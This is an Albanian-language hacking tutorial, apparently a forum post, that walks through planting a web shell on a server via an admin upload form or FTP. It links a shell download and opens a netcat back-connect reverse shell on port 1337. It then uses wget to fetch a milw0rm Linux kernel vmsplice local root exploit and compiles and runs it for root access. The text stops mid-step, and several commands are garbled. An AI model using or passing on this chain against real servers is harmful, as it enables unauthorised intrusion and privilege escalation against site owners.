Para së gjithash, ne duhet të upload-ojmë një shell në host. Ne mund të bëjmë këtë nëpërmjet admincp, ose ne mund të përdorim protokollin File Transfer (FTP server).
Si mund të upload-ojmë një shell përmes admin panel:
1. Ne do të hyjm si administrator.
2. Ne do të gjejmë një vend ku mund të upload-ojmë një fotografi ose një video.
3. Pasi të kemi gjetur një vend, zgjidhni shell dhe upload atë atje. ( Ju kisha rekomandu GNYShell, mund ta gjeni në http://www.darkc0de.biz/sh3llz/gnyshell.txt )
4. Ajo duhet për me tregu një shembull nga foto-ja që kemi bërë upload, pastaj klikojmë copy image location, dhe shohim shellin
Si mund të upload-ojmë një shell përmes protokollit File Transfer (FTP):
1. Shkojmë logohemi n'ftp.
2. Ne do të përdorim një klient FTP si FileZilla të upload-ojmë një shell.
3. Shkoni tek url-ja ku e vendosëm shellin .
Tani, ne mund të fillojme me komandat nga "execute" funksion të shell, por unë ju rekomandoj Back-Connect.
Për ta bërë këtë, ju duhet netcat. Pasi ne e vendosim atë në directory tonë, ne duhet të hapur komandën e menjëhershëm, dhe përdorimi i disa komanda për të shkuar në directory.
Shembull:
cd \Users\bL3nDi.b0y\Downloads\Netcat
Prej këtu do të përdorim opcionin e shellit back-connect. Për këtë tutorial ne do të spejgojmë në portin 1337.
Tani, ne do të shkruajmë këtë komandë në netcat:
Kodi:
nc-l-n-v-p 1337
Duhet te marrim nje pergjigje si "listening on [any] 1337 ..."
Dhe klikoni në Connect tek shelli juaj.
Tani, ne do të shkruajmë uname-a ose id
Duhet të tregojë diçka si kjo:
Kodi:
Zx8.rapidns.com Linux 2.6.18-8.el5 # 1 SMP Tue Feb 15 19:57:35 EDT 2007 i686
uid = 99 <nobody> gid = 99 <nobody> grupe = 99 <nobody>
Tani, ne duam të upload-ojmë ose wget (rrëmbej një file nga serveri).
wgetting shfrytëzuar nga milw0rm:
1. Tash ne e shkruajm këtë kod:
wget Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit
2. Tash n'server ruhet si 5.093 . Ne tani do të përpilojnë atë nëpërmjet lloj gcc (komandën më poshtë
5093.c gcc-o pwn
3. Për të ekzekutuar atë, ne do shkruajmë. / Pwn.
Uploadoni nje fajll tek serveri:
1. Ne do te upload-ojmë nje file duke shfrytëzuar shellin.
2. Ne do ta ekzekutojmë atë duke përdorur këtë komand: